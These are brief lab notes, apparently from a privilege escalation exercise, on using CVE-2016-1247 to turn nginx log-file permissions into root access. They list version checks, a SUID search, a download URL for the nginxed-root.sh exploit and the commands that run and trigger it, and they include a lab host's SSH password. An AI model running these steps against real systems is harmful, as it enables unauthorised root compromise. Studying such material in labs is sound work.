Resources:
https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
because of the logs the server makes, you can abuse them to gain root from www-data
how to find?
run linux exploit suggester:
[+] [CVE-2016-1247] nginxed-root.sh
Details: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
Tags: debian=8,ubuntu=14.04|16.04|16.10
Download URL: https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh
Comments: Rooting depends on cron.daily (up to 24h of dealy). Affected: deb8: <1.6.2; 14.04: <1.4.6; 16.04: 1.10.0anything under 1.6.2 is affected.
manual check:
dpkg -l | grep nginxii nginx-common 1.6.2-5+deb8u2~bpo70+1 small, powerful, scalable web/proxy server - common files
ii nginx-full 1.6.2-5+deb8u2~bpo70+1 nginx web/proxy server (standard version)these are affected!
this takes advantage of the suid bit to be applied to sudo
find / -type f -perm -04000 -ls 2>/dev/null812578 172 -rwsr-xr-x 2 root root 168136 Jan 5 2016 /usr/bin/sudocheck log files and perms:
ls -la /var/log/nginxthe execute on root can be abused
remember the log files names
cd to tools/nginx for the nginxed-root.sh:
cd /home/user/tools/nginx
./nginxed-root.sh /var/log/nginx/access.log
to generate that traffic waiting to happen, ssh again:
ssh root@10.10.47.240
password123then invoke nginx:
invoke-rc.d nginx rotate >/dev/null 2>&1and we get root:
